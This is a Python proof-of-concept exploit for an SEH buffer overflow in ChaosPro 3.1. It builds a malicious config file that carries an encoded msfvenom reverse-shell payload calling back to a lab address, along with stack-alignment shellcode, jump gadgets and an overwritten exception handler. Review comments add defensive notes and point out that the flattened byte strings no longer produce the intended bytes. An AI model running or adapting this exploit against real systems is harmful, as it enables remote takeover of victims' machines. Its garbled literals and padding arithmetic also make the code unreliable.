ChaosPro 3.1 SEH Buffer Overflow

#!C:Python27python.exe

# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# Proof-of-concept for the ChaosPro 3.1 SEH overflow. It assembles a
# ChaosPro.cfg whose "Username" line carries the encoded payload and whose
# "ProjectPath" value is long enough to run past a fixed-size buffer and
# overwrite the exception-handler record (the "seh address" appended at the
# bottom). The script performs no network activity itself; its only side
# effect is the file write at the very end.
#
# NOTE(review): in this copy every string literal has been flattened to
# printable text (e.g. "x83xC4x02" is nine characters, not the three bytes
# the comment next to it implies). The listing therefore documents the
# layout the comments describe but does not produce it as printed; in
# particular the hard-coded `- 15` terms in the padding arithmetic below
# stand for three 5-byte lines and no longer match what those strings
# contribute.
#
# What a defender can take from it:
#   * The handler overwrite is a hard-coded address (three bytes plus an
#     implied 0x00, see the last append), so it presumably relies on the
#     target module sitting at a predictable base without SafeSEH;
#     /SAFESEH, /DYNAMICBASE or SEHOP on the host removes that primitive.
#   * The trigger is the application's own config file, so an unexpected
#     write to ChaosPro.cfg under Program Files, followed by an outbound
#     TCP connection from the process (the msfvenom line below names
#     windows/shell_reverse_tcp), is the observable.

# our egg!
# 8-byte tag that later code searches for; nothing in this file shows how
# it is located — confirm against the blog post before relying on that.
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "x83xC4x02"

#the payload
# Detection note: the payload is an encoded reverse shell (see the msfvenom
# line). Its observable effect is an outbound TCP connection from the
# ChaosPro process to LHOST:LPORT; the LHOST shown is the author's lab
# address (RFC 1918) and would differ in any real use.
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b 'x00'
"x89xe1xdbxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx42x53x30"
"x33x30x43x30x55x30x4bx39x4bx55x46x51x4fx30x32"
"x44x4cx4bx56x30x56x50x4cx4bx46x32x54x4cx4cx4b"
"x50x52x45x44x4cx4bx34x32x37x58x44x4fx4fx47x30"
"x4ax36x46x30x31x4bx4fx4ex4cx47x4cx45x31x43x4c"
"x44x42x56x4cx47x50x4fx31x58x4fx34x4dx45x51x39"
"x57x4bx52x4cx32x56x32x31x47x4cx4bx46x32x32x30"
"x4cx4bx50x4ax47x4cx4cx4bx30x4cx32x31x52x58x4b"
"x53x31x58x53x31x4ex31x36x31x4cx4bx50x59x37x50"
"x45x51x58x53x4cx4bx47x39x35x48x4dx33x37x4ax30"
"x49x4cx4bx57x44x4cx4bx53x31x49x46x46x51x4bx4f"
"x4ex4cx39x51x58x4fx54x4dx45x51x4fx37x36x58x4d"
"x30x33x45x4ax56x43x33x43x4dx4cx38x57x4bx43x4d"
"x56x44x42x55x5ax44x31x48x4cx4bx46x38x31x34x35"
"x51x4ex33x35x36x4cx4bx34x4cx30x4bx4cx4bx56x38"
"x45x4cx55x51x38x53x4cx4bx54x44x4cx4bx45x51x38"
"x50x4dx59x51x54x46x44x56x44x31x4bx31x4bx43x51"
"x31x49x50x5ax30x51x4bx4fx4bx50x51x4fx31x4fx51"
"x4ax4cx4bx32x32x4ax4bx4cx4dx31x4dx42x48x47x43"
"x57x42x53x30x55x50x35x38x53x47x43x43x30x32x31"
"x4fx31x44x33x58x30x4cx33x47x57x56x54x47x4bx4f"
"x49x45x48x38x4ax30x35x51x43x30x35x50x56x49x59"
"x54x36x34x36x30x52x48x56x49x4bx30x52x4bx35x50"
"x4bx4fx59x45x30x50x56x30x56x30x46x30x51x50x36"
"x30x57x30x46x30x55x38x4ax4ax54x4fx39x4fx4bx50"
"x4bx4fx39x45x4dx47x42x4ax35x55x52x48x45x5ax53"
"x30x33x37x34x51x52x48x45x52x53x30x54x51x31x4c"
"x4dx59x5ax46x32x4ax52x30x50x56x46x37x32x48x5a"
"x39x59x35x54x34x43x51x4bx4fx39x45x4dx55x49x50"
"x33x44x44x4cx4bx4fx30x4ex44x48x43x45x5ax4cx35"
"x38x4cx30x48x35x4fx52x36x36x4bx4fx49x45x55x38"
"x52x43x52x4dx52x44x43x30x4bx39x4bx53x56x37x46"
"x37x31x47x50x31x4ax56x33x5ax42x32x51x49x46x36"
"x4bx52x4bx4dx53x56x4fx37x51x54x57x54x37x4cx53"
"x31x43x31x4cx4dx50x44x31x34x34x50x58x46x55x50"
"x30x44x31x44x30x50x30x56x50x56x50x56x30x46x36"
"x36x50x4ex31x46x50x56x50x53x31x46x43x58x52x59"
"x58x4cx47x4fx4bx36x4bx4fx49x45x4dx59x4dx30x50"
"x4ex30x56x57x36x4bx4fx36x50x45x38x44x48x4cx47"
"x35x4dx45x30x4bx4fx49x45x4fx4bx5ax50x48x35x59"
"x32x30x56x42x48x4ex46x4ax35x4fx4dx4dx4dx4bx4f"
"x4ex35x37x4cx54x46x53x4cx54x4ax4dx50x4bx4bx4b"
"x50x52x55x33x35x4fx4bx31x57x54x53x54x32x32x4f"
"x43x5ax33x30x31x43x4bx4fx4ex35x41x41"
)

#badchars
# Byte values the target does not pass through unchanged (per the author);
# this is why the payload above is alpha_upper-encoded and, presumably, why
# every building block below stays in the low printable range.
#x0ax1ax3bx90x91x92x93x94x95x96x97x98x99x9a
#x9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9
#xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8
#xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7
#xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6
#xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5
#xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4
#xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff

# stack alignment
# Building blocks reused throughout the buffer; each name records the
# instruction(s) the string stands for, and their len() is what the padding
# arithmetic further down subtracts.
pop_esp = "x5c"
pop_eax = "x58"
push_eax = "x50"
push_esp = "x54"
align_stack = "x2dx8fx8ex8dx8cx2dx7ex68x71x72x2dx01x01x01x01"
zero_eax = "x25x7ex7ex05x7ex25x01x01x7ax01"

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "x40x75x80x75"
jmpforward06 = "x40x75x06x75"

#line containing our payload
# The Username line only has to carry the payload; the overflow itself is
# in the ProjectPath value that follows.
line_start = "Username "
line_start += payload + " "

#line with our overflow
line_start += "ProjectPath "
junk = line_start

#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522

#junk += alpha_numeric_hex
# NOTE(review): the commented-out line above references alpha_numeric_hex,
# which is not defined anywhere in this file; it is dead.
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# baby nopsled
junk += "A" * 9

# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp

# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "x2dx89x88x87x86"
junk += "x2dx01x8fx77x8f"
junk += "x2dx01x04x01x02"
junk += push_eax

# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "x2dx4fx4ex4dx4c"
junk += "x2dx01x39x8fx02"
junk += "x2dx01x03x3cx01"
junk += push_eax

# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "x2dx8fx8ex74x73"
junk += "x2dx3ex19x01x8f"
junk += "x2dx03x01x01x26"
junk += push_eax

# size for section one
# Pads this section to exactly 126 bytes so the jump pair below lands where
# the author expects. Each hard-coded 15 stands for the three 5-byte lines
# of one section; the surrounding len() terms cover the reused blocks.
junk += "A" * (
126
- 9 # nopsled

# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)

# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)

# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#Section Two

# baby nopsled
junk += "AAA"

# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "x2dx80x15x75x75"
junk += "x2dx80x20x32x35"
junk += "x2dx14x11x04x25"
junk += push_eax

# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx89"
junk += "x2dx34x6bx17x01"
junk += "x2dx01x01x01x01"
junk += push_eax

# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx8c"
junk += "x2dx1dx18x8ex43"
junk += "x2dx01x01x17x01"
junk += push_eax

# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "x2dx8fx8ex8dx8c"
junk += "x2dx3ex7fx2dx2d"
junk += "x2dx02x17x01x03"
junk += push_eax

# Same 126-byte budget as section one; note that this one also reserves
# room for the trailing nopsled and the jmpback80 that follow.
junk += "A" * (
126 # amount of room before we need to jump

- 3 # baby nopsled

# part one of fourth set of bytes going onto the stack
- len(zero_eax)

# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)

# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- 4 # baby nopsled
- len(jmpback80)
)

# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

# baby nopsled
junk += "AAAA"

# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "x2dx65x65x75x75"
junk += "x2dx65x65x25x25"
junk += "x2dx37x25x23x13"
junk += push_eax

# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "x2dx8fx81x7cx7b"
junk += "x2dx2dx17x01x8f"
junk += "x2dx01x01x01x2b"
junk += push_eax

# Third and last 126-byte budget; unlike the previous two it subtracts both
# jump strings up front.
junk += "A" * (
126 # amount of room before we need to jump

- len(jmpback80)

- 4 # baby nopsled

# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)

# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- len(jmpforward06)
)

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
# Only three bytes are written; per the author's note the fourth is a 0x00
# supplied at the end of the line. That ties the address to a low-mapped,
# fixed-base module (presumably the application itself — confirm), which is
# exactly what /SAFESEH, /DYNAMICBASE or SEHOP would break.
junk += "x5dx10x40"

# write the evil file
# The only side effect of the script: it replaces the application's config
# file under Program Files, which needs write access to that directory.
# File-integrity monitoring on this path is the cheapest detection point.
with open('C:\Program Files\ChaosPro3.1\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)